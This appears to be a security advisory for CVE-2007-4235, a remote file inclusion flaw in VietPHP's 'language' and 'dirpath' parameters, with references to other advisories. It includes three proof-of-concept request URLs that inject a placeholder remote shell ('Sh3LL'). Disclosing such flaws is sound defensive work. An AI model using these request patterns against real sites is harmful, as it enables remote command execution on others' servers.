VietPHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'index.php' not properly sanitizing user input supplied to the 'language' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
http://[target]/path/admin/index.php?language=Sh3LL http://[target]/index.php??language=Sh3LL http://[target]/_functions.php?dirpath=Sh3LL
Vendor URL: http://www.vietphp.info/ Related OSVDB ID: 39207 Related OSVDB ID: 39208 Related OSVDB ID: 39209 Other Advisory URL: http://securityreason.com/securityalert/2983 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0089.html ISS X-Force ID: 35846 CVE-2007-4235 Bugtraq ID: 25226